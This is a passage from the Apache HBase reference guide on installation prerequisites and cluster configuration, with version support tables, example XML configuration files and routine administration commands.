sure you copy the contents of the _conf\/_ directory to all nodes of the cluster.\nHBase will not do this for you.\nUse `rsync`, `scp`, or another secure mechanism for copying the configuration files to your nodes.\nFor most configurations, a restart is needed for servers to pick up changes. Dynamic configuration is an exception to this, to be described later below.\n====\n\n[[basic.prerequisites]]\n== Basic Prerequisites\n\nThis section lists required services and some required system configuration.\n\n[[java]]\n.Java\n\nThe following table summarizes the recommendations of the HBase community with respect to deploying on various Java versions. An entry of \"yes\" is meant to indicate a base level of testing and willingness to help diagnose and address issues you might run into. Similarly, an entry of \"no\" or \"Not Supported\" generally means that should you run into an issue the community is likely to ask you to change the Java environment before proceeding to help. In some cases, specific guidance on limitations (e.g. whether compiling \/ unit tests work, specific operational issues, etc.) will also be noted.\n\n.Long Term Support JDKs are recommended\n[TIP]\n====\nHBase recommends downstream users rely on JDK releases that are marked as Long Term Supported (LTS) either from the OpenJDK project or vendors. As of March 2018 that means Java 8 is the only applicable version and that the next likely version to see testing will be Java 11 near Q3 2018.\n====\n\n.Java support by release line\n[cols=\"1,1,1,1,1\", options=\"header\"]\n|===\n|HBase Version\n|JDK 7\n|JDK 8\n|JDK 9\n|JDK 10\n\n|2.0\n|link:http:\/\/search-hadoop.com\/m\/YGbbsPxZ723m3as[Not Supported]\n|yes\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n\n|1.3\n|yes\n|yes\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n\n\n|1.2\n|yes\n|yes\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n\n|===\n\nNOTE: HBase will neither build nor compile with Java 6.\n\nNOTE: You must set `JAVA_HOME` on each node of your cluster. _hbase-env.sh_ provides a handy mechanism to do this.\n\n[[os]]\n.Operating System Utilities\nssh::\n HBase uses the Secure Shell (ssh) command and utilities extensively to communicate between cluster nodes. Each server in the cluster must be running `ssh` so that the Hadoop and HBase daemons can be managed. You must be able to connect to all nodes via SSH, including the local node, from the Master as well as any backup Master, using a shared key rather than a password. You can see the basic methodology for such a set-up in Linux or Unix systems at \"<<passwordless.ssh.quickstart>>\". If your cluster nodes use OS X, see the section, link:https:\/\/wiki.apache.org\/hadoop\/Running_Hadoop_On_OS_X_10.5_64-bit_%28Single-Node_Cluster%29[SSH: Setting up Remote Desktop and Enabling Self-Login] on the Hadoop wiki.\n\nDNS::\n HBase uses the local hostname to self-report its IP address. Both forward and reverse DNS resolving must work in versions of HBase previous to 0.92.0. The link:https:\/\/github.com\/sujee\/hadoop-dns-checker[hadoop-dns-checker] tool can be used to verify DNS is working correctly on the cluster. 
The project `README` file provides detailed instructions on usage.\n\nLoopback IP::\n Prior to hbase-0.96.0, HBase only used the IP address `127.0.0.1` to refer to `localhost`, and this was not configurable.\n See <<loopback.ip,Loopback IP>> for more details.\n\nNTP::\n The clocks on cluster nodes should be synchronized. A small amount of variation is acceptable, but larger amounts of skew can cause erratic and unexpected behavior. Time synchronization is one of the first things to check if you see unexplained problems in your cluster. It is recommended that you run a Network Time Protocol (NTP) service, or another time-synchronization mechanism on your cluster and that all nodes look to the same service for time synchronization. See the link:http:\/\/www.tldp.org\/LDP\/sag\/html\/basic-ntp-config.html[Basic NTP Configuration] at [citetitle]_The Linux Documentation Project (TLDP)_ to set up NTP.\n\n[[ulimit]]\nLimits on Number of Files and Processes (ulimit)::\n Apache HBase is a database. It requires the ability to open a large number of files at once. Many Linux distributions limit the number of files a single user is allowed to open to `1024` (or `256` on older versions of OS X). You can check this limit on your servers by running the command `ulimit -n` when logged in as the user which runs HBase. See <<trouble.rs.runtime.filehandles,the Troubleshooting section>> for some of the problems you may experience if the limit is too low. You may also notice errors such as the following:\n+\n----\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Exception in createBlockOutputStream java.io.EOFException\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Abandoning block blk_-6935524980745310745_1391901\n----\n+\nIt is recommended to raise the ulimit to at least 10,000, but more likely 10,240, because the value is usually expressed in multiples of 1024. Each ColumnFamily has at least one StoreFile, and possibly more than six StoreFiles if the region is under load. The number of open files required depends upon the number of ColumnFamilies and the number of regions. The following is a rough formula for calculating the potential number of open files on a RegionServer.\n+\n.Calculate the Potential Number of Open Files\n----\n(StoreFiles per ColumnFamily) x (regions per RegionServer)\n----\n+\nFor example, assuming that a schema had 3 ColumnFamilies per region with an average of 3 StoreFiles per ColumnFamily, and there are 100 regions per RegionServer, the JVM will open `3 * 3 * 100 = 900` file descriptors, not counting open JAR files, configuration files, and others. Opening a file does not take many resources, and the risk of allowing a user to open too many files is minimal.\n+\nAnother related setting is the number of processes a user is allowed to run at once. In Linux and Unix, the number of processes is set using the `ulimit -u` command. This should not be confused with the `nproc` command, which reports the number of CPUs available to a given user. Under load, a `ulimit -u` that is too low can cause OutOfMemoryError exceptions. See Jack Levin's major HDFS issues thread on the hbase-users mailing list, from 2011.\n+\nConfiguring the maximum number of file descriptors and processes for the user who is running the HBase process is an operating system configuration, rather than an HBase configuration. It is also important to be sure that the settings are changed for the user that actually runs HBase. 
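As a quick sanity check, you can print the effective limits for that user (a sketch; substitute your own service account for `hbase`, and note that a non-login shell may not pick up PAM limits):\n+\n----\n$ sudo -u hbase bash -c 'ulimit -n -u'\n----\n+\n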
To see which user started HBase, and that user's ulimit configuration, look at the first line of the HBase log for that instance. A useful read on setting configuration on your Hadoop cluster is Aaron Kimball's _Configuration Parameters: What can you just ignore?_\n+\n.`ulimit` Settings on Ubuntu\n====\nTo configure ulimit settings on Ubuntu, edit _\/etc\/security\/limits.conf_, which is a space-delimited file with four columns. Refer to the man page for _limits.conf_ for details about the format of this file. In the following example, the first line sets both soft and hard limits for the number of open files (nofile) to 32768 for the operating system user with the username hadoop. The second line sets the number of processes to 32000 for the same user.\n----\nhadoop - nofile 32768\nhadoop - nproc 32000\n----\nThe settings are only applied if the Pluggable Authentication Module (PAM) environment is directed to use them. To configure PAM to use these limits, be sure that the _\/etc\/pam.d\/common-session_ file contains the following line:\n----\nsession required pam_limits.so\n----\n====\n\nLinux Shell::\n All of the shell scripts that come with HBase rely on the link:http:\/\/www.gnu.org\/software\/bash[GNU Bash] shell.\n\nWindows::\n Prior to HBase 0.96, running HBase on Microsoft Windows was supported only for testing purposes.\n Running production systems on Windows machines is not recommended.\n\n\n[[hadoop]]\n=== link:https:\/\/hadoop.apache.org[Hadoop](((Hadoop)))\n\nThe following table summarizes the versions of Hadoop supported with each version of HBase.\nBased on the version of HBase, you should select the most appropriate version of Hadoop.\nYou can use Apache Hadoop, or a vendor's distribution of Hadoop.\nNo distinction is made here.\nSee link:https:\/\/wiki.apache.org\/hadoop\/Distributions%20and%20Commercial%20Support[the Hadoop wiki] for information about vendors of Hadoop.\n\n.Hadoop 2.x is recommended.\n[TIP]\n====\nHadoop 2.x is faster and includes features, such as short-circuit reads, which will help improve your HBase random read profile.\nHadoop 2.x also includes important bug fixes that will improve your overall HBase experience. HBase does not support running with\nearlier versions of Hadoop. See the table below for requirements specific to different HBase versions.\n\nHadoop 3.x is still in early access releases and has not yet been sufficiently tested by the HBase community for production use cases.\n====\n\nUse the following legend to interpret this table:\n\n* \"S\" = supported\n* \"X\" = not supported\n* \"NT\" = Not tested\n\n.Hadoop version support matrix\n[cols=\"1,1,1,1\", options=\"header\"]\n|===\n| | HBase-1.2.x | HBase-1.3.x | HBase-2.0.x\n|Hadoop-2.0.x-alpha | X | X | X\n|Hadoop-2.1.0-beta | X | X | X\n|Hadoop-2.2.0 | X | X | X\n|Hadoop-2.3.x | X | X | X\n|Hadoop-2.4.x | S | S | X\n|Hadoop-2.5.x | S | S | X\n|Hadoop-2.6.0 | X | X | X\n|Hadoop-2.6.1+ | S | S | S\n|Hadoop-2.7.0 | X | X | X\n|Hadoop-2.7.1+ | S | S | S\n|Hadoop-2.8.[0-1] | X | X | X\n|Hadoop-2.8.2+ | NT | NT | NT\n|Hadoop-2.9.0 | X | X | X\n|Hadoop-3.0.0 | NT | NT | NT\n|===\n\n.Hadoop Pre-2.6.1 and JDK 1.8 Kerberos\n[TIP]\n====\nWhen using pre-2.6.1 Hadoop versions and JDK 1.8 in a Kerberos environment, the HBase server can fail\nand abort due to a Kerberos keytab relogin error. 
Late versions of JDK 1.7 (1.7.0_80) have the problem too.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-10786[HADOOP-10786] for additional details.\nConsider upgrading to Hadoop 2.6.1+ in this case.\n====\n\n.Hadoop 2.6.x\n[TIP]\n====\nHadoop distributions based on the 2.6.x line *must* have\nlink:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-11710[HADOOP-11710] applied if you plan to run\nHBase on top of an HDFS Encryption Zone. Failure to do so will result in cluster failure and\ndata loss. This patch is present in Apache Hadoop releases 2.6.1+.\n====\n\n.Hadoop 2.y.0 Releases\n[TIP]\n====\nStarting around the time of Hadoop version 2.7.0, the Hadoop PMC got into the habit of calling out new minor releases on their major version 2 release line as not stable \/ production ready. As such, HBase expressly advises downstream users to avoid running on top of these releases. Note that, additionally, the 2.8.1 release was given the same caveat by the Hadoop PMC. For reference, see the release announcements for link:https:\/\/s.apache.org\/hadoop-2.7.0-announcement[Apache Hadoop 2.7.0], link:https:\/\/s.apache.org\/hadoop-2.8.0-announcement[Apache Hadoop 2.8.0], link:https:\/\/s.apache.org\/hadoop-2.8.1-announcement[Apache Hadoop 2.8.1], and link:https:\/\/s.apache.org\/hadoop-2.9.0-announcement[Apache Hadoop 2.9.0].\n====\n\n.Replace the Hadoop Bundled With HBase!\n[NOTE]\n====\nBecause HBase depends on Hadoop, it bundles an instance of the Hadoop jar under its _lib_ directory.\nThe bundled jar is ONLY for use in standalone mode.\nIn distributed mode, it is _critical_ that the version of Hadoop that is out on your cluster match what is under HBase.\nReplace the hadoop jar found in the HBase lib directory with the hadoop jar you are running on your cluster to avoid version mismatch issues.\nMake sure you replace the jar in HBase across your whole cluster.\nHadoop version mismatch issues have various manifestations, but often they all look like a hung cluster.\n====\n\n[[dfs.datanode.max.transfer.threads]]\n==== `dfs.datanode.max.transfer.threads` (((dfs.datanode.max.transfer.threads)))\n\nAn HDFS DataNode has an upper bound on the number of files that it will serve at any one time.\nBefore doing any loading, make sure you have configured Hadoop's _conf\/hdfs-site.xml_, setting the `dfs.datanode.max.transfer.threads` value to at least the following:\n\n[source,xml]\n----\n\n<property>\n <name>dfs.datanode.max.transfer.threads<\/name>\n <value>4096<\/value>\n<\/property>\n----\n\nBe sure to restart your HDFS after making the above configuration.\n\nNot having this configuration in place makes for strange-looking failures.\nOne manifestation is a complaint about missing blocks.\nFor example:\n\n----\n10\/12\/08 20:10:31 INFO hdfs.DFSClient: Could not obtain block\n blk_XXXXXXXXXXXXXXXXXXXXXX_YYYYYYYY from any node: java.io.IOException: No live nodes\n contain current block. Will get new block locations from namenode and retry...\n----\n\nSee also <<casestudies.max.transfer.threads,casestudies.max.transfer.threads>> and note that this property was previously known as `dfs.datanode.max.xcievers` (e.g. link:http:\/\/ccgtech.blogspot.com\/2010\/02\/hadoop-hdfs-deceived-by-xciever.html[Hadoop HDFS: Deceived by Xciever]).\n\n[[zookeeper.requirements]]\n=== ZooKeeper Requirements\n\nZooKeeper 3.4.x is required.\nHBase makes use of the `multi` functionality that is only available since ZooKeeper 3.4.0. 
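One quick way to confirm which version your ensemble is actually running is ZooKeeper's `stat` four-letter command (a sketch; it assumes `nc` is available, the command is not disabled on the server, and a ZooKeeper node at `zk1.example.com`):\n\n[source,bash]\n----\n# The first line of the reply reports the ZooKeeper server version\necho stat | nc zk1.example.com 2181 | head -n 1\n----\n\n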
The `hbase.zookeeper.useMulti` configuration property defaults to `true`.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12241[HBASE-12241 (The crash of regionServer when taking deadserver's replication queue breaks replication)] and link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6775[HBASE-6775 (Use ZK.multi when available for HBASE-6710 0.92\/0.94 compatibility fix)] for background.\nThe property is deprecated and useMulti is always enabled in HBase 2.0.\n\n[[standalone_dist]]\n== HBase run modes: Standalone and Distributed\n\nHBase has two run modes: <<standalone,standalone>> and <<distributed,distributed>>.\nOut of the box, HBase runs in standalone mode.\nWhatever your mode, you will need to configure HBase by editing files in the HBase _conf_ directory.\nAt a minimum, you must edit [code]+conf\/hbase-env.sh+ to tell HBase which +java+ to use.\nIn this file you set HBase environment variables such as the heapsize and other options for the `JVM`, the preferred location for log files, etc.\nSet [var]+JAVA_HOME+ to point at the root of your +java+ install.\n\n[[standalone]]\n=== Standalone HBase\n\nThis is the default mode.\nStandalone mode is what is described in the <<quickstart,quickstart>> section.\nIn standalone mode, HBase does not use HDFS -- it uses the local filesystem instead -- and it runs all HBase daemons and a local ZooKeeper all in the same JVM.\nZooKeeper binds to a well-known port so clients may talk to HBase.\n\n[[standalone.over.hdfs]]\n==== Standalone HBase over HDFS\nA sometimes useful variation on standalone HBase has all daemons running inside the\none JVM but rather than persist to the local filesystem, instead\nthey persist to an HDFS instance.\n\nYou might consider this profile when you want a simple deploy profile, the load is\nlight, and the data must persist across node comings and goings. Writing to\nHDFS where data is replicated ensures the latter.\n\nTo configure this standalone variant, edit your _hbase-site.xml_,\nsetting _hbase.rootdir_ to point at a directory in your\nHDFS instance but then set _hbase.cluster.distributed_\nto _false_. For example:\n\n[source,xml]\n----\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>false<\/value>\n <\/property>\n<\/configuration>\n----\n\n[[distributed]]\n=== Distributed\n\nDistributed mode can be subdivided into distributed but all daemons run on a single node -- a.k.a. _pseudo-distributed_ -- and _fully-distributed_ where the daemons are spread across all nodes in the cluster.\nThe _pseudo-distributed_ vs. _fully-distributed_ nomenclature comes from Hadoop.\n\nPseudo-distributed mode can run against the local filesystem or it can run against an instance of the _Hadoop Distributed File System_ (HDFS). 
Fully-distributed mode can ONLY run on HDFS.\nSee the Hadoop link:https:\/\/hadoop.apache.org\/docs\/current\/[documentation] for how to set up HDFS.\nA good walk-through for setting up HDFS on Hadoop 2 can be found at http:\/\/www.alexjf.net\/blog\/distributed-systems\/hadoop-yarn-installation-definitive-guide.\n\n[[pseudo]]\n==== Pseudo-distributed\n\n.Pseudo-Distributed Quickstart\n[NOTE]\n====\nA quickstart has been added to the <<quickstart,quickstart>> chapter.\nSee <<quickstart_pseudo,quickstart-pseudo>>.\nSome of the information that was originally in this section has been moved there.\n====\n\nA pseudo-distributed mode is simply a fully-distributed mode run on a single host.\nUse this HBase configuration for testing and prototyping purposes only.\nDo not use this configuration for production or for performance evaluation.\n\n[[fully_dist]]\n=== Fully-distributed\n\nBy default, HBase runs in standalone mode.\nBoth standalone mode and pseudo-distributed mode are provided for the purposes of small-scale testing.\nFor a production environment, distributed mode is advised.\nIn distributed mode, multiple instances of HBase daemons run on multiple servers in the cluster.\n\nJust as in pseudo-distributed mode, a fully distributed configuration requires that you set the `hbase.cluster.distributed` property to `true`.\nTypically, the `hbase.rootdir` is configured to point to a highly-available HDFS filesystem.\n\nIn addition, the cluster is configured so that multiple cluster nodes enlist as RegionServers, ZooKeeper QuorumPeers, and backup HMaster servers.\nThese configuration basics are all demonstrated in <<quickstart_fully_distributed,quickstart-fully-distributed>>.\n\n.Distributed RegionServers\nTypically, your cluster will contain multiple RegionServers all running on different servers, as well as primary and backup Master and ZooKeeper daemons.\nThe _conf\/regionservers_ file on the master server contains a list of hosts whose RegionServers are associated with this cluster.\nEach host is on a separate line.\nAll hosts listed in this file will have their RegionServer processes started and stopped when the master server starts or stops.\n\n.ZooKeeper and HBase\nSee the <<zookeeper,ZooKeeper>> section for ZooKeeper setup instructions for HBase.\n\n.Example Distributed HBase Cluster\n====\nThis is a bare-bones _conf\/hbase-site.xml_ for a distributed HBase cluster.\nA cluster that is used for real-world work would contain more custom configuration parameters.\nMost HBase configuration directives have default values, which are used unless the value is overridden in the _hbase-site.xml_.\nSee \"<<config.files,Configuration Files>>\" for more information.\n\n[source,xml]\n----\n\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <\/property>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>node-a.example.com,node-b.example.com,node-c.example.com<\/value>\n <\/property>\n<\/configuration>\n----\n\nThis is an example _conf\/regionservers_ file, which contains a list of nodes that should run a RegionServer in the cluster.\nThese nodes need HBase installed and they need to use the same contents of the _conf\/_ directory as the Master server.\n\n[source]\n----\n\nnode-a.example.com\nnode-b.example.com\nnode-c.example.com\n----\n\nThis is an example _conf\/backup-masters_ file, which contains a list of the nodes that should 
run a backup Master instance.\nThe backup Master instances will sit idle unless the main Master becomes unavailable.\n\n[source]\n----\n\nnode-b.example.com\nnode-c.example.com\n----\n====\n\n.Distributed HBase Quickstart\nSee <<quickstart_fully_distributed,quickstart-fully-distributed>> for a walk-through of a simple three-node cluster configuration with multiple ZooKeeper, backup HMaster, and RegionServer instances.\n\n.Procedure: HDFS Client Configuration\n. Of note, if you have made HDFS client configuration changes on your Hadoop cluster, such as configuration directives for HDFS clients, as opposed to server-side configurations, you must use one of the following methods to enable HBase to see and use these configuration changes:\n+\na. Add a pointer to your `HADOOP_CONF_DIR` to the `HBASE_CLASSPATH` environment variable in _hbase-env.sh_.\nb. Add a copy of _hdfs-site.xml_ (or _hadoop-site.xml_) or, better, symlinks, under _${HBASE_HOME}\/conf_, or\nc. if you have only a small set of HDFS client configurations, add them to _hbase-site.xml_.\n\n\nAn example of such an HDFS client configuration is `dfs.replication`.\nIf, for example, you want to run with a replication factor of 5, HBase will create files with the default of 3 unless you do the above to make the configuration available to HBase.\n\n[[confirm]]\n== Running and Confirming Your Installation\n\nMake sure HDFS is running first.\nStart and stop the Hadoop HDFS daemons by running _bin\/start-dfs.sh_ over in the `HADOOP_HOME` directory.\nYou can ensure it started properly by testing the `put` and `get` of files into the Hadoop filesystem.\nHBase does not normally use the MapReduce or YARN daemons. These do not need to be started.\n\n_If_ you are managing your own ZooKeeper, start it and confirm it's running, otherwise HBase will start up ZooKeeper for you as part of its start process.\n\nStart HBase with the following command:\n\n----\nbin\/start-hbase.sh\n----\n\nRun the above from the `HBASE_HOME` directory.\n\nYou should now have a running HBase instance.\nHBase logs can be found in the _logs_ subdirectory.\nCheck them out especially if HBase had trouble starting.\n\nHBase also puts up a UI listing vital attributes.\nBy default it's deployed on the Master host at port 16010 (HBase RegionServers listen on port 16020 by default and put up an informational HTTP server at port 16030). 
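For a quick scripted liveness check of the Master UI, you can request it with `curl` (a sketch; it assumes the default port, a Master host named `master.example.org` as in the next paragraph, and the `\/master-status` path, which may vary across versions):\n\n[source,bash]\n----\n# Expect an HTTP 200 status line while the Master UI is serving\ncurl -sI http:\/\/master.example.org:16010\/master-status | head -n 1\n----\n\n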
If the Master is running on a host named `master.example.org` on the default port, point your browser at pass:[http:\/\/master.example.org:16010] to see the web interface.\n\nOnce HBase has started, see the <<shell_exercises,shell exercises>> section for how to create tables, add data, scan your insertions, and finally disable and drop your tables.\n\nTo stop HBase, after exiting the HBase shell, enter:\n\n----\n$ .\/bin\/stop-hbase.sh\nstopping hbase...............\n----\n\nShutdown can take a moment to complete.\nIt can take longer if your cluster comprises many machines.\nIf you are running a distributed operation, be sure to wait until HBase has shut down completely before stopping the Hadoop daemons.\n\n[[config.files]]\n== Default Configuration\n\n[[hbase.site]]\n=== _hbase-site.xml_ and _hbase-default.xml_\n\nJust as in Hadoop where you add site-specific HDFS configuration to the _hdfs-site.xml_ file, for HBase, site-specific customizations go into the file _conf\/hbase-site.xml_.\nFor the list of configurable properties, see <<hbase_default_configurations,hbase default configurations>> below or view the raw _hbase-default.xml_ source file in the HBase source code at _src\/main\/resources_.\n\nNot all configuration options make it out to _hbase-default.xml_.\nSome configurations would only appear in source code; the only way to identify these is through code review.\n\nCurrently, changes here will require a cluster restart for HBase to notice the change.\n\/\/ hbase\/src\/main\/asciidoc\n\/\/\ninclude::{docdir}\/..\/..\/..\/target\/asciidoc\/hbase-default.adoc[]\n\n\n[[hbase.env.sh]]\n=== _hbase-env.sh_\n\nSet HBase environment variables in this file.\nExamples include options to pass to the JVM on start of an HBase daemon, such as heap size and garbage collector configs.\nYou can also set configurations for HBase configuration, log directories, niceness, ssh options, where to locate process pid files, etc.\nOpen the file at _conf\/hbase-env.sh_ and peruse its content.\nEach option is fairly well documented.\nAdd your own environment variables here if you want them read by HBase daemons on startup.\n\nChanges here will require a cluster restart for HBase to notice the change.\n\n[[log4j]]\n=== _log4j.properties_\n\nEdit this file to change the rate at which HBase log files are rolled and to change the level at which HBase logs messages.\n\nChanges here will require a cluster restart for HBase to notice the change, though log levels can be changed for particular daemons via the HBase UI.\n\n[[client_dependencies]]\n=== Client configuration and dependencies connecting to an HBase cluster\n\nIf you are running HBase in standalone mode, you don't need to configure anything for your client to work, provided that the client and server are on the same machine.\n\nSince the HBase Master may move around, clients bootstrap by looking to ZooKeeper for current critical locations.\nZooKeeper is where all these values are kept.\nThus clients require the location of the ZooKeeper ensemble before they can do anything else.\nUsually this ensemble location is kept out in the _hbase-site.xml_ and is picked up by the client from the `CLASSPATH`.\n\nIf you are configuring an IDE to run an HBase client, you should include the _conf\/_ directory on your classpath so _hbase-site.xml_ settings can be found (or add _src\/test\/resources_ to pick up the hbase-site.xml used by tests).\n\nMinimally, an HBase client needs the hbase-client module in its dependencies when connecting to a cluster:\n[source,xml]\n----\n<dependency>\n 
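<!-- This comment is illustrative: pick the hbase-client version that matches the HBase release deployed on your cluster -->\n 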
<groupId>org.apache.hbase<\/groupId>\n <artifactId>hbase-client<\/artifactId>\n <version>1.2.4<\/version>\n<\/dependency>\n----\n\nA basic example _hbase-site.xml_ for client only may look as follows:\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>Comma separated list of servers in the ZooKeeper ensemble.\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[java.client.config]]\n==== Java client configuration\n\nThe configuration used by a Java client is kept in an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HBaseConfiguration[HBaseConfiguration] instance.\n\nThe factory method on HBaseConfiguration, `HBaseConfiguration.create();`, on invocation, will read in the content of the first _hbase-site.xml_ found on the client's `CLASSPATH`, if one is present (invocation will also factor in any _hbase-default.xml_ found; an _hbase-default.xml_ ships inside the _hbase.X.X.X.jar_). It is also possible to specify configuration directly without having to read from a _hbase-site.xml_.\nFor example, to set the ZooKeeper ensemble for the cluster programmatically, do as follows:\n\n[source,java]\n----\nConfiguration config = HBaseConfiguration.create();\nconfig.set(\"hbase.zookeeper.quorum\", \"localhost\"); \/\/ Here we are running zookeeper locally\n----\n\nIf multiple ZooKeeper instances make up your ZooKeeper ensemble, they may be specified in a comma-separated list (just as in the _hbase-site.xml_ file). This populated `Configuration` instance can then be passed to an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], and so on.\n\n[[config_timeouts]]\n=== Timeout settings\n\nHBase provides many timeout settings to limit the execution time of different remote operations.\n\nThe `hbase.rpc.timeout` property limits how long an RPC call can run before it times out.\nYou can also specify a timeout for read and write operations using the `hbase.rpc.read.timeout` and `hbase.rpc.write.timeout` configuration properties. In the absence of these properties `hbase.rpc.timeout` will be used.\nA higher-level timeout is `hbase.client.operation.timeout`, which is valid for each client call.\nTimeout for scan operations is controlled differently. 
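To set it you can use the `hbase.client.scanner.timeout.period` property.\nFor illustration, a client could tighten these programmatically before creating a connection (a sketch; the property names appear above, but the values are milliseconds and purely illustrative):\n\n[source,java]\n----\nConfiguration config = HBaseConfiguration.create();\n\/\/ Fail an individual RPC after 20 seconds\nconfig.setInt(\"hbase.rpc.timeout\", 20000);\n\/\/ Cap each client call, retries included, at 60 seconds\nconfig.setInt(\"hbase.client.operation.timeout\", 60000);\n\/\/ Allow up to two minutes between scanner next() invocations\nconfig.setInt(\"hbase.client.scanner.timeout.period\", 120000);\n----\n\n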
[[example_config]]\n== Example Configurations\n\n=== Basic Distributed HBase Install\n\nHere is a basic configuration example for a distributed ten-node cluster:\n\n* The nodes are named `example0`, `example1`, etc., through node `example9` in this example.\n* The HBase Master and the HDFS NameNode are running on the node `example0`.\n* RegionServers run on nodes `example1`-`example9`.\n* A 3-node ZooKeeper ensemble runs on `example1`, `example2`, and `example3` on the default ports.\n* ZooKeeper data is persisted to the directory _\/export\/zookeeper_.\n\nBelow we show what the main configuration files -- _hbase-site.xml_, _regionservers_, and _hbase-env.sh_ -- found in the HBase _conf_ directory might look like.\n\n[[hbase_site]]\n==== _hbase-site.xml_\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>Comma separated list of servers in the ZooKeeper ensemble.\n <\/description>\n <\/property>\n <property>\n <name>hbase.zookeeper.property.dataDir<\/name>\n <value>\/export\/zookeeper<\/value>\n <description>Property from ZooKeeper config zoo.cfg.\n The directory where the snapshot is stored.\n <\/description>\n <\/property>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/example0:8020\/hbase<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <description>The mode the cluster will be in. Possible values are\n false: standalone and pseudo-distributed setups with managed ZooKeeper\n true: fully-distributed with unmanaged ZooKeeper Quorum (see hbase-env.sh)\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[regionservers]]\n==== _regionservers_\n\nIn this file you list the nodes that will run RegionServers.\nIn our case, these nodes are `example1`-`example9`.\n\n[source]\n----\nexample1\nexample2\nexample3\nexample4\nexample5\nexample6\nexample7\nexample8\nexample9\n----\n\n[[hbase_env]]\n==== _hbase-env.sh_\n\nThe following lines in the _hbase-env.sh_ file show how to set the `JAVA_HOME` environment variable (required for HBase) and set the heap to 4 GB (rather than the default value of 1 GB). If you copy and paste this example, be sure to adjust the `JAVA_HOME` to suit your environment.\n\n----\n# The java implementation to use.\nexport JAVA_HOME=\/usr\/java\/jdk1.8.0\/\n\n# The maximum amount of heap to use. Default is left to JVM default.\nexport HBASE_HEAPSIZE=4G\n----\n\nUse +rsync+ to copy the content of the _conf_ directory to all nodes of the cluster.\n\n[[important_configurations]]\n== The Important Configurations\n\nBelow we list some _important_ configurations.\nWe've divided this section into required configuration and worth-a-look recommended configs.\n\n[[required_configuration]]\n=== Required Configurations\n\nReview the <<os,os>> and <<hadoop,hadoop>> sections.\n\n[[big.cluster.config]]\n==== Big Cluster Configurations\n\nIf you have a cluster with a lot of regions, it is possible that a RegionServer checks in briefly after the Master starts while all the remaining RegionServers lag behind. 
This first server to check in will be assigned all regions, which is not optimal.\nTo prevent the above scenario from happening, increase the `hbase.master.wait.on.regionservers.mintostart` property from its default value of 1.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6389[HBASE-6389 Modify the\n conditions to ensure that Master waits for sufficient number of Region Servers before\n starting region assignments] for more detail.\n\n[[recommended_configurations]]\n=== Recommended Configurations\n\n[[recommended_configurations.zk]]\n==== ZooKeeper Configuration\n\n[[sect.zookeeper.session.timeout]]\n===== `zookeeper.session.timeout`\n\nThe default timeout is three minutes (specified in milliseconds). This means that if a server crashes, it will be three minutes before the Master notices the crash and starts recovery.\nYou might need to tune the timeout down to a minute or even less so the Master notices failures sooner.\nBefore changing this value, be sure you have your JVM garbage collection configuration under control, otherwise, a long garbage collection that lasts beyond the ZooKeeper session timeout will take out your RegionServer. (You might be fine with this -- you probably want recovery to start on the server if a RegionServer has been in GC for a long period of time).\n\nTo change this configuration, edit _hbase-site.xml_, copy the changed file across the cluster and restart.\n\nWe set this value high to save ourselves having to field questions up on the mailing lists asking why a RegionServer went down during a massive import.\nThe usual cause is that their JVM is untuned and they are running into long GC pauses.\nOur thinking is that while users are getting familiar with HBase, we'd save them having to know all of its intricacies.\nLater, when they've built some confidence, they can play with configuration such as this.\n\n[[zookeeper.instances]]\n===== Number of ZooKeeper Instances\n\nSee <<zookeeper,zookeeper>>.\n\n[[recommended.configurations.hdfs]]\n==== HDFS Configurations\n\n[[dfs.datanode.failed.volumes.tolerated]]\n===== `dfs.datanode.failed.volumes.tolerated`\n\nThis is the \"...number of volumes that are allowed to fail before a DataNode stops offering service.\nBy default any volume failure will cause a datanode to shutdown\" from the _hdfs-default.xml_ description.\nYou might want to set this to about half the amount of your available disks.\n\n[[hbase.regionserver.handler.count]]\n===== `hbase.regionserver.handler.count`\n\nThis setting defines the number of threads that are kept open to answer incoming requests to user tables.\nThe rule of thumb is to keep this number low when the payload per request approaches megabytes (big puts, scans using a large cache) and high when the payload is small (gets, small puts, ICVs, deletes). 
